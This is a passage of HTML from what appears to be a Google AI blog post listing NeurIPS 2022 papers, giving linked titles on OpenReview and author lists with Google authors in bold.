for Learning to Defer to an Expert</a><br><i><b>Harikrishna Narasimhan</b></i>, <i><b>Wittawat Jitkrittum</b></i>,<i><b> Aditya Krishna Menon</b></i>,<i><b> Ankit Singh Rawat</b></i>,<i><b> Sanjiv Kumar</b></i></p><p>     <a href="https://openreview.net/pdf?id=bEMrmaw8gOB">Model-Based RL with Optimistic Posterior Sampling: Structural Conditions and Sample Complexity</a><br><i><b>Alekh Agarwal</b></i>, <i><b>Tong Zhang</b></i></p><p>     <a href="https://openreview.net/pdf?id=65eqtvEShR8">On the Statistical Efficiency of Reward-Free Exploration in Non-Linear RL</a><br>     Jinglin Chen, Aditya Modi, Akshay Krishnamurthy, Nan Jiang, <i><b>Alekh Agarwal</b></i></p><p>     <a href="https://openreview.net/pdf?id=r-6Z1SJbCpv">Towards Learning Universal Hyperparameter Optimizers with Transformers</a> (see <a href="https://ai.googleblog.com/2022/08/optformer-towards-universal.html">blog post</a>) <br>     Yutian Chen, <i><b>Xingyou Song</b></i>,<i><b> Chansoo Lee</b></i>,<i><b> Zi Wang</b></i>,<i><b> Qiuyi Zhang</b></i>,<i><b> David Dohan</b></i>, Kazuya Kawakami, <i><b>Greg Kochanski</b></i>, Arnaud Doucet, Marc'aurelio Ranzato, <i><b>Sagi Perel</b></i>,<i><b> </b></i>Nando de Freitas </p><p>     <a href="https://openreview.net/pdf?id=3LMI8CHDb0g">Reproducibility in Optimization: Theoretical Framework and Limits</a><br>     Kwangjun Ahn<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, <i><b>Prateek Jain</b></i>,<i><b> Ziwei Ji</b></i>,<i><b> Satyen Kale</b></i>,<i><b> Praneeth Netrapalli</b></i>, <i><b>Gil I. Shamir</b></i></p><p>     <a href="https://openreview.net/pdf?id=uLYc4L3C81A">Confident Adaptive Language Modeling</a><br><i><b>Tal Schuster</b></i>, Adam Fisch, <i><b>Jai Gupta</b></i>,<i><b> Mostafa Dehghani</b></i>,<i><b> Dara Bahri</b></i>,<i><b> Vinh Q. Tran</b></i>, <i><b>Yi Tay</b></i>,<i><b> Donald Metzler</b></i></p><p>     <a href="https://openreview.net/pdf?id=3SLW-YIw7tX">Reinforcement Learning with Neural Radiance Fields</a><br>     Danny Driess, Ingmar Schubert, <i><b>Pete Florence</b></i>, Yunzhu Li, Marc Toussaint </p><p>     <a href="https://openreview.net/pdf?id=dSJuEcqmEIF">Invariant and Transportable Representations for Anti-Causal Domain Shifts</a><br>     Yibo Jiang, <i><b>Victor Veitch</b></i></p><p>     <a href="https://openreview.net/pdf?id=ylila4AYSpV">Simple Mechanisms for Welfare Maximization in Rich Advertising Auctions</a><br><i><b>Gagan Aggarwal</b></i>, <i><b>Kshipra Bhawalkar</b></i>,<i><b> Aranyak Mehta</b></i>,<i><b> </b></i>Divyarthi Mohan, Alexandros Psomas </p><p>     <a href="https://openreview.net/pdf?id=_3ELRdg2sgI">STaR: Bootstrapping Reasoning with Reasoning</a><br>     Eric Zelikman, <i><b>Yuhuai Wu</b></i>, Jesse Mu, Noah D. Goodman </p><p>     <a href="https://openreview.net/pdf?id=VgX6ceDerh2">Stochastic Online Learning with Feedback Graphs: Finite-Time and Asymptotic Optimality</a><br><i><b>Teodor V. Marinov</b></i>, <i><b>Mehryar Mohri</b></i>,<i><b> Julian Zimmert</b></i></p><p>     <a href="https://openreview.net/pdf?id=b57KM4ydqpp">The Curse of Unrolling: Rate of Differentiating Through Optimization</a><br>     Damien Scieur, Quentin Bertrand, Gauthier Gidel, <i><b>Fabian Pedregosa</b></i></p><p>     <a href="https://openreview.net/pdf?id=o4uFFg9_TpV">Visual Prompting via Image Inpainting</a><br>     Amir Bar, Yossi Gandelsman, Trevor Darrell, <i><b>Amir Globerson</b></i>, Alexei A Efros </p><p>     <a href="https://openreview.net/pdf?id=06OVtS901hF">Multi-Class H-Consistency Bounds</a><br><i><b>Pranjal Awasthi</b></i>, Anqi Mao, <i><b>Mehryar Mohri</b></i>, Yutao Zhong </p><p>     <a href="https://openreview.net/pdf?id=00jwOr7UA4P">Anonymous Bandits for Multi-User Systems</a><br><i><b>Hossein Esfandiari</b></i>,<i><b> Vahab Mirrokni</b></i>,<i><b> Jon Schneider</b></i></p><p>     <a href="https://openreview.net/pdf?id=jHIn0U9U6RO">Understanding the Eluder Dimension</a><br>     Gene Li, <i><b>Pritish Kamath</b></i>, Dylan J. Foster, Nathan Srebro </p><p>     <a href="https://openreview.net/pdf?id=z64kN1h1-rR">Why So Pessimistic? Estimating Uncertainties for Offline RL Through Ensembles, and Why Their Independence Matters</a><br><i><b>Seyed Kamyar Seyed Ghasemipour</b></i>, <i><b>Shixiang Shane Gu</b></i>,<i><b> Ofir Nachum</b></i></p><p>     <a href="https://openreview.net/pdf?id=Dqcoao24G8s">A Best-of-Both-Worlds Algorithm for Bandits with Delayed Feedback</a><br>     Saeed Masoudian, <i><b>Julian Zimmert</b></i>, Yevgeny Seldin </p><p>     <a href="https://openreview.net/pdf?id=AODVskSug8">A Theoretical View on Sparsely Activated Networks</a><br><i><b>Cenk Baykal</b></i>,<i><b> Nishanth Dikkala</b></i>,<i><b> Rina Panigrahy</b></i>,<i><b> Cyrus Rashtchian</b></i>,<i><b> Xin Wang</b></i></p><p>     <a href="https://openreview.net/pdf?id=_VjQlMeSB_J">Chain of Thought Prompting Elicits Reasoning in Large Language Models</a> (see <a href="https://ai.googleblog.com/2022/05/language-models-perform-reasoning-via.html">blog post</a>) <br><i><b>Jason Wei</b></i>,<i><b> Xuezhi Wang</b></i>,<i><b> Dale Schuurmans</b></i>,<i><b> Maarten Bosma</b></i>,<i><b> Brian Ichter</b></i>,<i><b> Fei Xia</b></i>, <i><b>Ed Chi</b></i>,<i><b> Quoc Le</b></i>,<i><b> Denny Zhou</b></i></p><p>     <a href="https://openreview.net/pdf?id=02dbnEbEFn">Decoupled Context Processing for Context Augmented Language Modeling</a><br><i><b>Zonglin Li</b></i>,<i><b> Ruiqi Guo</b></i>,<i><b> Sanjiv Kumar</b></i></p><p>     <a href="https://openreview.net/pdf?id=68YyraaeYmc">Exploring Through Random Curiosity with General Value Functions</a><br>     Aditya Ramesh, Louis Kirsch, <i><b>Sjoerd van Steenkiste</b></i>, Jürgen Schmidhuber </p><p>     <a href="https://openreview.net/pdf?id=znNmsN_O7Sh">Object Scene Representation Transformer</a><br><i><b>Mehdi S. M. Sajjadi</b></i>,<i><b> Daniel Duckworth</b></i>, <i><b>Aravindh Mahendran</b></i>,<i><b> Sjoerd van Steenkiste</b></i>, <i><b>Filip Pavetić</b></i>,<i><b> Mario Lučić</b></i>,<i><b> Leonidas J. Guibas</b></i>,<i><b> Klaus Greff</b></i>,<i><b> Thomas Kipf</b></i></p><p>     <a href="https://openreview.net/pdf?id=LYfFj-Vk6lt">Joint Model-Policy Optimization of a Lower Bound for Model-Based RL</a><br><i><b>Benjamin Eysenbach</b></i>, Alexander Khazatsky, <i><b>Sergey Levine</b></i>, Ruslan Salakhutdinov </p><p>     <a href="https://openreview.net/pdf?id=thirVlDJ2IL">A Fourier Approach to Mixture Learning</a><br>     Mingda Qiao<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, <i><b>Guru Guruganesh</b></i>,<i><b> Ankit Singh Rawat</b></i>,<i><b> Avinava Dubey</b></i>, Manzil Zaheer </p><p>     <a href="https://openreview.net/pdf?id=-ZPeUAJlkEu">Why Neural Networks Find Simple Solutions: The Many Regularizers of Geometric Complexity</a><br><i><b>Benoit Dherin</b></i>,<i><b> Michael Munn</b></i>,<i><b> </b></i>Mihaela Rosca<i><b>, </b></i>David Barrett </p><p>     <a href="https://openreview.net/pdf?id=A2Ya5aLtyuG">Do Current Multi-task Optimization Methods in Deep Learning Even Help?</a><br><i><b>Derrick Xin</b></i>,<i><b> Behrooz Ghorbani</b></i>,<i><b> Ankush Garg</b></i>, <i><b>Orhan Firat</b></i>,<i><b> Justin Gilmer</b></i></p><p>     <a href="https://openreview.net/pdf?id=hq-p55-qil9">Associating Objects and Their Effects in Video Through Coordination Games</a><br><i><b>Erika Lu</b></i>,<i><b> Forrester Cole</b></i>,<i><b> </b></i>Weidi Xie,<i><b> Tali Dekel</b></i>, <i><b>William Freeman</b></i>,<i><b> </b></i>Andrew Zisserman<i><b>, Michael Rubinstein</b></i></p><p>     <a href="https://openreview.net/pdf?id=NkK4i91VWp">Increasing Confidence in Adversarial Robustness Evaluations</a><br>     Roland S. Zimmermann<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, Wieland Brendel, <i><b>Florian Tramèr</b></i>, <i><b>Nicholas Carlini</b></i></p><p>     <a href="https://openreview.net/pdf?id=XzeTJBq1Ce2">The Role of Baselines in Policy Gradient Optimization</a><br><i><b>Jincheng Mei</b></i>, Wesley Chung, Valentin Thomas, <i><b>Bo Dai</b></i>,<i><b> Csaba Szepesvari</b></i>, <i><b>Dale Schuurmans</b></i></p><p>     <a href="https://openreview.net/pdf?id=7WuCttgNQ79">Scaling Multimodal Pre-training via Cross-Modality Gradient Harmonization</a><br>     Junru Wu, <i><b>Yi Liang</b></i>, <i><b>Feng Han</b></i>, <i><b>Hassan Akbari</b></i>, Zhangyang Wang, Cong Yu<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a></p> <p>     <a href="https://openreview.net/pdf?id=ldl2V3vLZ5">S3GC: Scalable Self-Supervised Graph Clustering</a><br>     Fnu Devvrit<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, <i><b>Aditya Sinha</b></i>, <i><b>Inderjit Dhillon</b></i>, <i><b>Prateek Jain</b></i></p><p>     <a href="https://openreview.net/pdf?id=4LZo68TuF-4">Algorithms and Hardness for Learning Linear Thresholds from Label Proportions</a><br><i><b>Rishi Saket</b></i></p><p>     <a href="https://openreview.net/pdf?id=JUXn1vXcrLA">ALMA: Hierarchical Learning for Composite Multi-Agent Tasks</a><br>     Shariq Iqbal, Robby Costales, <i><b>Fei Sha</b></i></p><p>     <a href="https://openreview.net/pdf?id=Bs8iFQ7AM6">DC-BENCH: Dataset Condensation Benchmark</a><br>     Justin Cui, Ruochen Wang, <i><b>Si Si</b></i>, Cho-Jui Hsieh </p><p>     <a href="https://openreview.net/pdf?id=uytgM9N0vlR">Does GNN Pre-training Help Molecular Representation?</a><br><i><b>Ruoxi Sun</b></i>,<i><b> Hanjun Dai</b></i>,<i><b> Adams Yu</b></i></p><p>     <a href="https://openreview.net/pdf?id=tIZtD2kZ6zx">Drawing Out of Distribution with Neuro-Symbolic Generative Models</a><br>     Yichao Liang, Joshua B. Tenenbaum, <i><b>Tuan Anh Le</b></i>, N. Siddharth </p><p>     <a href="https://openreview.net/pdf?id=jdJo1HIVinI">Mixture-of-Experts with Expert Choice Routing</a><i><b> </b></i>(see <a href="https://ai.googleblog.com/2022/11/mixture-of-experts-with-expert-choice.html">blog post</a>) <br><i><b>Yanqi Zhou</b></i>,<i><b> Tao Lei</b></i>,<i><b> Hanxiao Liu</b></i>, <i><b>Nan Du</b></i>,<i><b> Yanping Huang</b></i>,<i><b> Vincent Zhao</b></i>, <i><b>Andrew Dai</b></i>,<i><b> Zhifeng Chen</b></i>,<i><b> Quoc Le</b></i>,<i><b> James Laudon</b></i></p> <p>     <a href="https://openreview.net/pdf?id=VE8QRTrWAMb">Near-Optimal Regret for Adversarial MDP with Delayed Bandit Feedback</a><br>     Tiancheng Jin, Tal Lancewicki, Haipeng Luo, <i><b>Yishay Mansour</b></i>, Aviv Rosenberg </p><p>     <a href="https://openreview.net/pdf?id=HvJC_KsSx8S">Precise Learning Curves and Higher-Order Scalings for Dot-Product Kernel Regression</a><br><i><b>Lechao Xiao</b></i>, Jeffrey Pennington, Theodor Misiakiewicz, Hong Hu, <i><b>Yue Lu</b></i></p><p>     <a href="https://openreview.net/pdf?id=Zh21fp1B0vv">Rate-Optimal Online Convex Optimization in Adaptive Linear Control</a><br>     Asaf Cassel, <i><b>Alon</b></i> <i><b>Cohen</b></i>,<i><b> Tomer Koren</b></i></p><p>     <a href="https://openreview.net/pdf?id=-ZPeUAJlkEu">Why Neural Networks Find Simple Solutions: The Many Regularizers of Geometric Complexity</a><br><i><b>Benoit Dherin</b></i>, <i><b>Michael Munn</b></i>, Mihaela Rosca, David G.T. Barrett </p><p>     <a href="https://openreview.net/pdf?id=jOYdlD4oYrn">Private Isotonic Regression</a><br><i><b>Badih Ghazi</b></i>, <i><b>Pritish Kamath</b></i>, <i><b>Ravi Kumar</b></i>, <i><b>Pasin Manurangsi</b></i></p><p>     <a href="https://openreview.net/pdf?id=fDWNnSiHeka">Sketching Based Representations for Robust Image Classification with Provable Guarantees</a><br><i><b>Nishanth Dikkala</b></i>,<i><b> Sankeerth Rao Karingula</b></i>, Raghu Meka, Jelani Nelson, <i><b>Rina Panigrahy</b></i>, <i><b>Xin Wang</b></i></p><p>     <a href="https://openreview.net/pdf?id=XzeTJBq1Ce2">The Role of Baselines in Policy Gradient Optimization</a><br><i><b>Jincheng Mei</b></i>, Wesley Chung, Valentin Thomas, <i><b>Bo Dai</b></i>, Csaba Szepesvari, <i><b>Dale Schuurmans</b></i></p><p>     <a href="https://openreview.net/pdf?id=0JV4VVBsK6a">Bringing Image Scene Structure to Video via Frame-Clip Consistency of Object Tokens</a><br>     Elad Ben Avraham, Roei Herzig, Karttikeya Mangalam, Amir Bar, Anna Rohrbach, Leonid Karlinsky, Trevor Darrell, <i><b>Amir Globerson</b></i></p><p>     <a href="https://openreview.net/pdf?id=9lQmaKMxIUD">Near-Optimal Private and Scalable k-Clustering</a><br><i><b>Vincent Cohen-Addad</b></i>, <i><b>Alessandro Epasto</b></i>, <i><b>Vahab Mirrokni</b></i>,<i><b> </b></i>Shyam Narayanan<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>,<i><b> Peilin Zhong</b></i></p><p>     <a href="https://openreview.net/pdf?id=FR--mkQu0dw">When Does Differentially Private Learning Not Suffer in High Dimensions?</a><br>     Xuechen Li, Daogao Liu, Tatsunori Hashimoto, Huseyin A Inan, Janardhan Kulkarni, YinTat Lee, <i><b>Abhradeep Guha Thakurta</b></i></p><p>     <a href="https://openreview.net/pdf?id=RF5Lb6NaZp">End-to-End Learning to Index and Search in Large Output Spaces</a><br>     Nilesh Gupta, Patrick H. Chen, Hsiang-Fu, Yu, Cho-Jui Hsieh, <i><b>Inderjit S. Dhillon</b></i></p><p>     <a href="https://openreview.net/pdf?id=GNHyNOR8Sn">A Boosting Approach to Reinforcement Learning</a><br>     Nataly Brukhim, <i><b>Elad Hazan</b></i>, Karan Singh </p><p>     <a href="https://openreview.net/pdf?id=OtxyysUdBE">FedRolex: Model-Heterogeneous Federated Learning with Rolling Sub-Model Extraction</a><br>     Samiul Alam, <i><b>Luyang Liu</b></i>, Ming Yan, Mi Zhang </p><p>     <a href="https://openreview.net/pdf?id=wsnMW0c_Au">Non-Convex Online Learning via Algorithmic Equivalence</a><br><i><b>Udaya Ghai</b></i>,<i><b> Zhou Lu</b></i>, <i><b>Elad Hazan</b></i></p><p>     <a href="https://openreview.net/pdf?id=lJHkZbX6Ic1">Is this the Right Neighborhood? Accurate and Query Efficient Model Agnostic Explanations</a><br>     Amit Dhurandhar, Karthikeyan Natesan Ramamurthy,<i><b> Karthikeyan Shanmugam</b></i></p><p>     <a href="https://openreview.net/pdf?id=fT9W53lLxNS">SAVi++: Towards End-to-End Object-Centric Learning from Real-World Videos</a><br><i><b>Gamaleldin F. Elsayed</b></i>,<i><b> Aravindh Mahendran</b></i>, <i><b>Sjoerd van Steenkiste</b></i>,<i><b> Klaus Greff</b></i>, <i><b>Michael C. Mozer</b></i>,<i><b> Thomas Kipf</b></i></p><p>     <a href="https://openreview.net/pdf?id=lxsL16YeE2w">UViM: A Unified Modeling Approach for Vision with Learned Guiding Codes</a><br><i><b>Alexander Kolesnikov</b></i>,<i><b> André Susano Pinto</b></i>,<i><b> Lucas Beyer</b></i>,<i><b> Xiaohua Zhai</b></i>,<i><b> Jeremiah Harmsen</b></i>,<i><b> Neil Houlsby</b></i></p><p>     <a href="https://openreview.net/pdf?id=pZsAwqUgnAs">Implicit Regularization or Implicit Conditioning? Exact Risk Trajectories of SGD in High Dimensions</a><br><i><b>Courtney Paquette</b></i>,<i><b> </b></i>Elliot Paquette,<i><b> Ben Adlam</b></i>, <i><b>Jeffrey Pennington</b></i></p><p>     <a href="https://openreview.net/pdf?id=0gouO5saq6K">Multi-game Decision Transformers</a> (see <a href="https://ai.googleblog.com/2022/07/training-generalist-agents-with-multi.html">blog post</a>) <br><i><b>Kuang-Huei Lee</b></i>,<i><b> Ofir Nachum</b></i>,<i><b> Mengjiao Yang</b></i>,<i><b> Lisa Lee</b></i>,<i><b> Daniel Freeman</b></i>,<i><b> Winnie Xu</b></i>,<i><b> Sergio Guadarrama</b></i>,<i><b> Ian Fischer</b></i>, <i><b>Eric Jang</b></i>,<i><b> Henryk Michalewski</b></i>,<i><b> Igor Mordatch</b></i></p><p>     <a href="https://openreview.net/pdf?id=5kThooa07pf">Subsidiary Prototype Alignment for Universal Domain Adaptation</a><br><i><b>Jogendra Nath Kundu</b></i>,<i><b> Suvaansh Bhambri</b></i>,<i><b> Akshay Ravindra Kulkarni</b></i>,<i><b> Hiran Sarkar</b></i>,<i><b> Varun Jampani</b></i>, <i><b>Venkatesh Babu Radhakrishnan</b></i></p><p>     <a href="https://openreview.net/pdf?id=iQpaHC7cPfR">SAMURAI: Shape And Material from Unconstrained Real-world Arbitrary Image collections</a><br>     Mark Boss<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, Andreas Engelhardt<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, <i><b>Abhishek Kar</b></i>, <i><b>Yuanzhen Li</b></i>,<i><b> Deqing Sun</b></i>, <i><b>Jonathan T. Barron</b></i>, Hendrik P. A. Lensch, <i><b>Varun Jampani</b></i></p><p>     <a href="https://openreview.net/pdf?id=vRwCvlvd8eA">Chefs’ Random Tables: Non-Trigonometric Random Features</a><br>     Valerii Likhosherstov, <i><b>Krzysztof Marcin Choromanski</b></i>,<i><b> Avinava Dubey</b></i>,<i><b> Frederick Liu</b></i>, <i><b>Tamas Sarlos</b></i>, Adrian Weller </p><p>     <a href="https://openreview.net/pdf?id=QLPzCpu756J">Lottery Tickets on a Data Diet: Finding Initializations with Sparse Trainable Networks</a><br>     Mansheej Paul, Brett W Larsen, Surya Ganguli, Jonathan Frankle, <i><b>Gintare Karolina Dziugaite</b></i></p><p>     <a href="https://openreview.net/pdf?id=rZalM6vZ2J">DP-PCA: Statistically Optimal and Differentially Private PCA</a><br>     Xiyang Liu, <i><b>Weihao Kong</b></i>,<i><b> Prateek Jain</b></i>,<i><b> Sewoong Oh</b></i></p><p>     <a href="https://openreview.net/pdf?id=qqHMvHbfu6">Emergent Communication: Generalization and Overfitting in Lewis Games</a><br>     Mathieu Rita, Corentin Tallec, Paul Michel, Jean-Bastien Grill, <i><b>Olivier Pietquin</b></i>, Emmanuel Dupoux, Florian Strub </p><p>     <a href="https://openreview.net/pdf?id=6yuil2_tn9a">Handcrafted Backdoors in Deep Neural Networks</a><br>     Sanghyun Hong, <i><b>Nicholas Carlini</b></i>, <i><b>Alexey Kurakin</b></i></p><p>     <a href="https://openreview.net/pdf?id=mjUrg0uKpQ">I2DFormer: Learning Image to Document Attention for Zero-Shot Image Classification</a><br>     Muhammad Ferjad Naeem, Yongqin Xian, Luc Van Gool, <i><b>Federico Tombari</b></i></p><p>     <a href="https://openreview.net/pdf?id=i9XrHJoyLqJ">Improved Differential Privacy for SGD via Optimal Private Linear Operators on Adaptive Streams</a><br>     Sergey Denisov, <i><b>Brendan McMahan</b></i>, <i><b>Keith Rush</b></i>, Adam Smith, <i><b>Abhradeep Guha Thakurta</b></i></p><p>     <a href="https://openreview.net/pdf?id=MZmv_B1DM3">Optimal Scaling for Locally Balanced Proposals in Discrete Spaces</a><br>     Haoran Sun<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, <i><b>Hanjun Dai</b></i>,<i><b> Dale Schuurmans</b></i></p><p>     <a href="https://openreview.net/pdf?id=wQVjGP5NbP9">Near-Optimal Correlation Clustering with Privacy</a><br><i><b>Vincent Cohen-Addad</b></i>, Chenglin Fan, <i><b>Silvio Lattanzi</b></i>, Slobodan Mitrović, <i><b>Ashkan Norouzi-Fard</b></i>,<i><b> Nikos Parotsidis</b></i>,<i><b> </b></i>Jakub Tarnawski </p><p>     <a href="https://openreview.net/pdf?id=fUeOyt-2EOp">Thor: Wielding Hammers to Integrate Language Models and Automated Theorem Provers</a><br>     Albert Q. Jiang, Wenda Li, Szymon Tworkowski, Konrad Czechowski, Tomasz Odrzygóźdź, Piotr Miłoś, <i><b>Yuhuai Wu</b></i>, Mateja Jamnik </p><p>     <a href="https://openreview.net/pdf?id=OoNmOfYVhEU">TPU-KNN: K Nearest Neighbor Search at Peak FLOP/s</a><br><i><b>Felix Chern</b></i>,<i><b> Blake Hechtman</b></i>,<i><b> Andy Davis</b></i>,<i><b> Ruiqi Guo</b></i>,<i><b> David Majnemer</b></i>, <i><b>Sanjiv Kumar</b></i></p><p>     <a href="https://openreview.net/pdf?id=mowt1WNhTC7">When Does Dough Become a Bagel? Analyzing the Remaining Mistakes on ImageNet</a><br><i><b>Vijay Vasudevan</b></i>,<i><b> Benjamin Caine</b></i>,<i><b> Raphael Gontijo-Lopes</b></i>,<i><b> Sara Fridovich-Keil</b></i>,<i><b> Rebecca Roelofs</b></i></p><p>     <a href="https://openreview.net/pdf?id=jBTQGGy9qA-">DASCO: Dual-Generator Adversarial Support Constrained Offline Reinforcement Learning</a><br><i><b>Quan Vuong</b></i>,<i><b> Aviral Kumar</b></i>,<i><b> Sergey Levine</b></i>,<i><b> Yevgen Chebotar</b></i></p><p>     <a href="https://openreview.net/pdf?id=B7Q2mbIFa6Q">A Characterization of Semi-Supervised Adversarially Robust PAC Learnability</a><br>     Idan Attias, Steve Hanneke, <i><b>Yishay Mansour</b></i></p><p>     <a href="https://openreview.net/pdf?id=mTXQIpXPDbh">Back Razor: Memory-Efficient Transfer Learning by Self-Sparsified Backpropagation</a><br>     Ziyu Jiang, Xuxi Chen, Xueqin Huang, <i><b>Xianzhi Du</b></i>,<i><b> Denny Zhou</b></i>, Zhangyang Wang </p><p>     <a href="https://openreview.net/pdf?id=lbQTJN42uea">Subquadratic Kronecker Regression with Applications to Tensor Decomposition</a><br><i><b>Matthew Fahrbach</b></i>, <i><b>Gang Fu</b></i>, Mehrdad Ghadiri </p><p>     <a href="https://openreview.net/pdf?id=u8FDFtoMKp2">Zero-Shot Transfer Learning Within a Heterogeneous Graph via Knowledge Transfer Networks</a><br>     Minji Yoon<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, <i><b>John Palowitch</b></i>, <i><b>Dustin Zelle</b></i>, Ziniu Hu<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, Ruslan Salakhutdinov, <i><b>Bryan Perozzi</b></i></p><p>     <a href="https://openreview.net/pdf?id=Fhty8PgFkDo">Differentially Private Graph Learning via Sensitivity-Bounded Personalized PageRank</a><br><i><b>Alessandro Epasto</b></i>, <i><b>Vahab Mirrokni</b></i>, <i><b>Bryan Perozzi</b></i>, <i><b>Anton Tsitsulin</b></i>, <i><b>Peilin Zhong</b></i></p><p>     <a href="https://ai.googleblog.com/2022/11/beyond-tabula-rasa-reincarnating.html">Reincarnating Reinforcement Learning: Reusing Prior Computation to Accelerate Progress</a> (see <a href="https://ai.googleblog.com/2022/11/beyond-tabula-rasa-reincarnating.html">blog post</a>) <br><i><b>Rishabh Agarwal</b></i>, <i><b>Max Schwarzer</b></i>,<i><b> Pablo Samuel Castro</b></i>, Aaron Courville, <i><b>Marc G. Bellemare</b></i></p><p>     <a href="https://openreview.net/pdf?id=OZEmgSbRQW">Private and Communication-Efficient Algorithms for Entropy Estimation</a><br>     Gecia Bravo-Hermsdorff, <i><b>Robert Busa-Fekete</b></i>, <i><b>Mohammad Ghavamzadeh</b></i>, <i><b>Andres Munoz Medina</b></i>, <i><b>Umar Syed</b></i></p><p>     <a href="https://openreview.net/pdf?id=JVtoIJrSxuO">Oracle Inequalities for Model Selection in Offline Reinforcement Learning</a><br>     Jonathan Lee, <i><b>George Tucker</b></i>, <i><b>Ofir Nachum</b></i>,<i><b> Bo Dai</b></i>, Emma Brunskill </p><p>     <a href="https://openreview.net/pdf?id=K-A4tDJ6HHf">Diagnosing Failures of Fairness Transfer Across Distribution Shift in Real-World Medical Settings</a><br>     Jessica Schrouff<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>,<i><b> Natalie Harris</b></i>,<i><b> Oluwasanmi O Koyejo</b></i>,<i><b> Ibrahim Alabdulmohsin</b></i>, Eva Schnider<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, <i><b>Krista Opsahl-Ong</b></i>, <i><b>Alexander Brown</b></i>,<i><b> Subhrajit Roy</b></i>, <i><b>Diana Mincu</b></i>,<i><b> Christina Chen</b></i>, <i><b>Awa Dieng</b></i>, <i><b>Yuan Liu</b></i>, <i><b>Vivek Natarajan</b></i>, <i><b>Alan Karthikesalingam</b></i>,<i><b> Katherine A Heller</b></i>, Silvia Chiappa, <i><b>Alexander D'Amour</b></i></p><p>     <a href="https://openreview.net/pdf?id=0TDki1mlcwz">LASSIE: Learning Articulated Shapes from Sparse Image Ensemble via 3D Part Discovery</a><br>     Chun-Han Yao, Wei-Chih Hung<i><b>, Yuanzhen Li</b></i>,<i><b> Michael Rubinstein</b></i>, <i><b>Ming-Hsuan Yang</b></i>,<i><b> Varun Jampani</b></i></p><p>     <a href="https://openreview.net/pdf?id=CZZFRxbOLC">Patching Open-Vocabulary Models by Interpolating Weights</a><br>     Gabriel Ilharco, Mitchell Wortsman, Samir Yitzhak Gadre, Shuran Song, Hannaneh Hajishirzi, <i><b>Simon Kornblith</b></i>, Ali Farhadi, Ludwig Schmidt </p><p>     <a href="https://openreview.net/pdf?id=VOPiHQUevh5">TUSK: Task-Agnostic Unsupervised Keypoints</a><br>     Yuhe Jin, Weiwei Sun, <i><b>Jan Hosang</b></i>, <i><b>Eduard Trulls</b></i>, Kwang Moo Yi </p><p>     <a href="https://openreview.net/pdf?id=dNXg-h6YX9h">Active Learning of Classifiers with Label and Seed Queries</a><br>     Marco Bressan, Nicolò Cesa-Bianchi, <i><b>Silvio Lattanzi</b></i>, Andrea Paudice, Maximilian Thiessen </p><p>     <a href="https://openreview.net/pdf?id=IUikebJ1Bf0">Autoformalization with Large Language Models</a><br><i><b>Yuhuai Wu</b></i>, Albert Q. Jiang, Wenda Li, <i><b>Markus N. Rabe</b></i>, <i><b>Charles Staats</b></i>, Mateja Jamnik, <i><b>Christian Szegedy</b></i></p><p>     <a href="https://openreview.net/pdf?id=lCGDKJGHoUv">Benign Underfitting of Stochastic Gradient Descent</a><br><i><b>Tomer Koren</b></i>, Roi Livni, <i><b>Yishay Mansour</b></i>, Uri Sherman </p> <p>     <a href="https://openreview.net/pdf?id=ZJqqSa8FsH9">Chain of Thought Imitation with Procedure Cloning</a><br><i><b>Mengjiao Yang</b></i>,<i><b> Dale Schuurmans</b></i>, Pieter Abbeel, <i><b>Ofir Nachum</b></i></p><p>     <a href="https://openreview.net/pdf?id=Q-HOv_zn6G">Efficient and Modular Implicit Differentiation</a><br><i><b>Mathieu Blondel</b></i>,<i><b> Quentin Berthet</b></i>,<i><b> Marco Cuturi</b></i>,<i><b> Roy Frostig</b></i>,<i><b> Stephan Hoyer</b></i>,<i><b> Felipe Llinares-López</b></i>,<i><b> Fabian Pedregosa</b></i>,<i><b> Jean-Philippe Vert</b></i></p><p>     <a href="https://openreview.net/pdf?id=XiLasGufCM">Insights into Pre-training via Simpler Synthetic Tasks</a><br><i><b>Yuhuai Wu</b></i>,<i><b> </b></i>Felix Li, Percy Liang </p><p>     <a href="https://openreview.net/pdf?id=5MgZAu2NR7X">Self-Supervised Learning with an Information Maximization Criterion</a><br>     Serdar Ozsoy, Shadi Hamdan, <i><b>Sercan Ö. Arik</b></i>, Deniz Yuret, Alper T. Erdogan </p><p>     <a href="https://openreview.net/pdf?id=VHmdFPy4U_u">Trimmed Maximum Likelihood Estimation for Robust Generalized Linear Model</a><br><i><b>Weihao Kong</b></i>, <i><b>Rajat Sen</b></i>, <i><b>Pranjal Awasthi</b></i>,<i><b> Abhimanyu Das</b></i></p><p>     <a href="https://openreview.net/pdf?id=CHMJSfuIX8">Using Embeddings for Causal Estimation of Peer Influence in Social Networks</a><br>     Irina Cristali, <i><b>Victor Veitch</b></i></p><p>     <a href="https://openreview.net/pdf?id=lme1MKnSMb">VCT: A Video Compression Transformer</a><br><i><b>Fabian Mentzer</b></i>,<i><b> George Toderici</b></i>,<i><b> David Minnen</b></i>, <i><b>Sung-Jin Hwang</b></i>, <i><b>Sergi Caelles</b></i>, <i><b>Mario Lucic</b></i>,<i><b> Eirikur Agustsson</b></i></p><p>     <a href="https://openreview.net/pdf?id=f3zNgKga_ep">Video Diffusion Models</a><br><i><b>Jonathan Ho</b></i>,<i><b> Tim Salimans</b></i>,<i><b> Alexey Gritsenko</b></i>,<i><b> William Chan</b></i>,<i><b> Mohammad Norouzi</b></i>, <i><b>David J. Fleet</b></i></p><p>     <a 